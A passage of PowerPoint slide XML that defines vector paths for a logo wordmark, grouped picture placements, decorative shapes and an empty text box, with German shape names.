                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1444587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37E0D-D517-54D6-6F9E-1147720C5079}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Gruppieren 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{033FB533-28E4-1322-C136-4E8126C8EA50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noMove="1" noResize="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-4564"/>
            <a:ext cx="12191999" cy="6928656"/>
            <a:chOff x="0" y="-4564"/>
            <a:chExt cx="12191999" cy="6928656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Grafik 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FCD4AD-F441-FC12-4BCC-AC34236F29A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noCrop="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="22628" r="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6834615" y="0"/>
              <a:ext cx="5357384" cy="6924092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Grafik 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87353DA9-62DD-0B94-D563-6B3684C626FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noCrop="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-4564"/>
              <a:ext cx="6924092" cy="6924092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Gruppieren 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17F78492-3E6D-D4F5-4F3D-AEC8FA85F596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2917540" y="944724"/>
            <a:ext cx="6778860" cy="6192688"/>
            <a:chOff x="2708428" y="944564"/>
            <a:chExt cx="6778860" cy="5974964"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rechteck: eine Ecke abgeschnitten 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDED0051-B3FC-D731-0F04-8ADB92216E93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2708428" y="944724"/>
              <a:ext cx="6775144" cy="5974804"/>
            </a:xfrm>
            <a:prstGeom prst="snip1Rect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15166"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="76200" cap="rnd">
              <a:roun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0" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="de-AT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rechtwinkliges Dreieck 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A049A96A-DAFE-5167-4782-174387F80168}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8558096" y="944564"/>
              <a:ext cx="929192" cy="903033"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200" cap="rnd">
              <a:roun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sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Textfeld 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63554255-0FE1-98EB-49C7-AF5056BBAF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2967368" y="1084086"/>
            <a:ext cx="6765036" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
